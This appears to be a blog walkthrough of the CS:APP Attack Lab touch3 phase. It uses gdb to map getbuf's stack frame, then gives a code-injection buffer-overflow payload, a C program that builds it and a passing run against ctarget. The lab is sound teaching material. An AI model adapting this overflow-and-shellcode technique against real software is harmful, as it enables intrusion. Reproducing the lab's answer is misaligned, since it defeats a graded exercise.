Illustrated, in-depth walkthrough of CS:APP Lab 3: Attack (with stack-frame analysis) (3)

1. A quick look at touch3

00000000004018fa <touch3>:
  4018fa:  53                       push   %rbx
  4018fb:  48 89 fb                 mov    %rdi,%rbx
  4018fe:  c7 05 d4 2b 20 00 03     movl   $0x3,0x202bd4(%rip)    # 6044dc <vlevel>
  401905:  00 00 00
  401908:  48 89 fe                 mov    %rdi,%rsi
  40190b:  8b 3d d3 2b 20 00        mov    0x202bd3(%rip),%edi    # 6044e4 <cookie>
  401911:  e8 36 ff ff ff           callq  40184c <hexmatch>
  401916:  85 c0                    test   %eax,%eax

The logic is simple: touch3 saves its argument (rdi) in rbx and sets vlevel to 3, copies rdi into rsi, loads the cookie into edi, and calls hexmatch(cookie, s). So rsi is the address of our string, and that address is whatever we put in rdi before jumping to touch3.

Note that hexmatch sets up a stack frame of its own and chooses a random offset inside it, so the address of the string s as hexmatch sees it cannot be predicted. The lab handout also warns that hexmatch and strncmp may overwrite getbuf's buffer, so the cookie string we pass must live somewhere safe. We can put it in test's stack frame, above getbuf's return address (the injected code itself can stay in the buffer, because it has already run by the time hexmatch writes anything). First, set a breakpoint just before getbuf allocates its frame:

b *0x4017a8

(gdb) b *0x4017a8
Breakpoint 1 at 0x4017a8: file buf.c, line 12.
(gdb) r -q
Starting program: /csapp/attack/ctarget -q
warning: Error disabling address space randomization: Operation not permitted
Missing separate debuginfos, use: yum debuginfo-install glibc-2.28-127.el8.x86_64
Cookie: 0x59b997fa

Breakpoint 1, getbuf () at buf.c:12
12      buf.c: No such file or directory.
(gdb) info r rsp
rsp            0x5561dca0          0x5561dca0

At this point rsp is 0x5561dca0, and since getbuf has not yet allocated its frame, that slot holds getbuf's saved return address, i.e. the next instruction in test:

(gdb) x 0x5561dca0
0x5561dca0:     0x00401976

A normal getbuf returns to:

0x401976:  89 c2    mov    %eax,%edx

Now let's lay out getbuf's stack frame right after it has been allocated (sub $0x28,%rsp, so the new rsp is 0x5561dca0 - 0x28 = 0x5561dc78). It's worth pausing to organize this:

0x5561dca8  (test's frame)
0x5561dca0  getbuf's return address (test's frame)    00 00 00 00 00 40 19 76
rsp+0x20    (getbuf's frame)                          00 00 00 00 00 00 00 00
rsp+0x18    (getbuf's frame)                          00 00 00 00 00 00 00 00
rsp+0x10    (getbuf's frame)                          00 00 00 00 00 00 00 00
rsp+0x8     (getbuf's frame)                          00 00 00 00 00 00 00 00
rsp         (getbuf's frame, rsp = 0x5561dc78)        00 00 00 00 00 00 00 00

(Each row is one 8-byte word, shown most significant byte first; rsp through rsp+0x27 is the 40-byte buffer that Gets fills.)

Since touch3 only needs the start address of a string, we can use the overflow to write the cookie string at 0x5561dca8 (just past the return-address slot, in test's frame), and overwrite getbuf's return address with the value of rsp, 0x5561dc78, which is the start of the buffer. Then, with the Level 2 technique, the instructions we placed at the start of the buffer run:

movq $0x5561dca8, %rdi
pushq $0x4018fa
retq

Let's look at the byte encoding of this assembly:

[root@cadc591c8a87 attack]# gcc -c l3.s
l3.s: Assembler messages:
l3.s: Warning: end of file not at end of a line; newline inserted
[root@cadc591c8a87 attack]# objdump -d l3.o

l3.o:     file format elf64-x86-64

Disassembly of section .text:

0000000000000000 <.text>:
   0:   48 c7 c7 a8 dc 61 55    mov    $0x5561dca8,%rdi
   7:   68 fa 18 40 00          pushq  $0x4018fa
   e:   c3                      retq

(Opcode 68 is push with a 32-bit immediate, which is why the operand must be written $0x4018fa; without the $, the assembler would emit a push of the memory at that address, not of the address itself.)

Now let's construct the input. First, the cookie as an ASCII string: "59b997fa" is 35 39 62 39 39 37 66 61. The input is then built as follows:

48 c7 c7 a8 dc 61 55 68   <- the instructions to execute, at the start of the buffer (0x5561dc78)
fa 18 40 00 c3 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00      (zero padding to fill the 40-byte buffer)
78 dc 61 55 00 00 00 00   <- return address overwritten with rsp (0x5561dc78)
35 39 62 39 39 37 66 61   <- "59b997fa" lands at 0x5561dca8; Gets appends the terminating NUL
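To make the layout above reproducible rather than hand-counted, here is an added C program that assembles the 56-byte line from the four things that actually vary between ctarget builds: the buffer address, the buffer size, touch3's address and the cookie. It is an added example, not code from the original post or from the lab's own tools. It hand-encodes the three instructions, so it also enforces the constraint the 13-byte layout silently relies on: both immediates must fit a sign-extended 32-bit operand. The hex_to_raw helper is an assumed re-implementation of what the lab's hex2raw does (whitespace-separated hex pairs to bytes), written so a hand-typed touch3.txt can be diffed against the generated bytes; the address values in main() are the ones read off the gdb session above.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* What differs between ctarget runs. The values in main() are the ones read off
 * the gdb session in this post; they are stable because ctarget disables stack
 * randomization. */
struct target {
    uint64_t buf_addr;    /* start of getbuf's buffer = rsp after sub $0x28,%rsp */
    size_t   buf_size;    /* bytes from buf to the saved return address (0x28) */
    uint64_t touch3_addr; /* where the injected code transfers control */
    uint32_t cookie;      /* touch3 expects this as an 8-character hex string */
};

static void put_le32(uint8_t *p, uint32_t v) {
    for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> (8 * i));
}

static void put_le64(uint8_t *p, uint64_t v) {
    for (int i = 0; i < 8; i++) p[i] = (uint8_t)(v >> (8 * i));
}

/* Hand-encode  mov $str_addr,%rdi ; pushq $touch3_addr ; retq.
 * 48 c7 c7 imm32 and 68 imm32 both take a sign-extended 32-bit immediate, so an
 * address above 0x7fffffff cannot be encoded this way (it would need movabs and
 * a different layout): return 0 instead of emitting garbage. */
size_t emit_call_touch3(uint8_t *out, uint64_t str_addr, uint64_t touch3_addr) {
    if (str_addr > 0x7fffffffULL || touch3_addr > 0x7fffffffULL) return 0;
    out[0] = 0x48; out[1] = 0xc7; out[2] = 0xc7;     /* mov $imm32,%rdi */
    put_le32(out + 3, (uint32_t)str_addr);
    out[7] = 0x68;                                   /* pushq $imm32    */
    put_le32(out + 8, (uint32_t)touch3_addr);
    out[12] = 0xc3;                                  /* retq            */
    return 13;
}

/* Build the line that Gets reads:
 *   [code][zeros up to buf_size][new return address = buf_addr][8-char cookie]
 * The string goes at buf_addr + buf_size + 8, just above the return-address
 * slot, so the pushes touch3 and hexmatch do later (which grow the stack down
 * from that slot) cannot clobber it; Gets stores the NUL right after it.
 * Returns the payload length, or 0 if something does not fit. */
size_t build_touch3_payload(const struct target *t, uint8_t *out, size_t cap) {
    size_t total = t->buf_size + 8 + 8;
    uint64_t str_addr = t->buf_addr + t->buf_size + 8;
    if (cap < total) return 0;
    size_t n = emit_call_touch3(out, str_addr, t->touch3_addr);
    if (n == 0 || n > t->buf_size) return 0;
    memset(out + n, 0, t->buf_size - n);             /* pad the rest of buf */
    put_le64(out + t->buf_size, t->buf_addr);        /* ret -> start of buf */
    char cookie_str[9];
    snprintf(cookie_str, sizeof cookie_str, "%08x", t->cookie);
    memcpy(out + t->buf_size + 8, cookie_str, 8);    /* "59b997fa", no NUL  */
    return total;
}

/* Parse hex2raw-style text ("48 c7 ..." separated by whitespace) into bytes,
 * so a hand-written touch3.txt can be compared with the generated payload.
 * Assumed re-implementation of what the lab's hex2raw does, not its code.
 * Returns the byte count, or 0 for a stray nibble or a non-hex character. */
size_t hex_to_raw(const char *hex, uint8_t *out, size_t cap) {
    size_t n = 0;
    int hi = -1;
    for (; *hex; hex++) {
        int d;
        if (*hex >= '0' && *hex <= '9') d = *hex - '0';
        else if (*hex >= 'a' && *hex <= 'f') d = *hex - 'a' + 10;
        else if (*hex >= 'A' && *hex <= 'F') d = *hex - 'A' + 10;
        else if (*hex == ' ' || *hex == '\n' || *hex == '\t') {
            if (hi >= 0) return 0;   /* "4 8" is not a byte */
            continue;
        } else return 0;
        if (hi < 0) { hi = d; continue; }
        if (n == cap) return 0;
        out[n++] = (uint8_t)((hi << 4) | d);
        hi = -1;
    }
    return hi < 0 ? n : 0;
}

int main(void) {
    /* Values from the gdb session above: buf at 0x5561dc78, 0x28-byte buffer,
     * touch3 at 0x4018fa, cookie 0x59b997fa. */
    struct target ctarget = { 0x5561dc78ULL, 0x28, 0x4018faULL, 0x59b997faU };
    uint8_t payload[64];
    size_t n = build_touch3_payload(&ctarget, payload, sizeof payload);
    /* Print in the format hex2raw reads, eight bytes per line. */
    for (size_t i = 0; i < n; i++)
        printf("%02x%c", payload[i], (i + 1) % 8 ? ' ' : '\n');
    return n ? 0 : 1;
}
```

Usage: compile, then `./payload > touch3.txt` and feed it through the lab's own `./hex2raw < touch3.txt | ./ctarget -q`. Two things the layout depends on are worth keeping in mind: the NUL that Gets appends lands one byte past the 8-character string, inside test's frame, which is harmless only because touch3 exits instead of returning; and if a different build placed the stack above 0x7fffffff, emit_call_touch3 would refuse to encode it, since `mov $imm32,%rdi` sign-extends its operand.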

Let's try it. It passes:

[root@cadc591c8a87 attack]# ./hex2raw < touch3.txt | ./ctarget -q
Cookie: 0x59b997fa
Type string:Touch3!: You called touch3("59b997fa")
Valid solution for level 3 with target ctarget
PASS: Would have posted the following:
        user id bovik
        course  15213-f15
        lab     attacklab
        result  1:PASS:0xffffffff:ctarget:3:48 C7 C7 A8 DC 61 55 68 FA 18 40 00 C3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 DC 61 55 00 00 00 00 35 39 62 39 39 37 66 61

Content copyright notice: unless otherwise stated, all articles are original to this site.

When reposting, credit the source: https://www.heiqu.com/wppxzj.html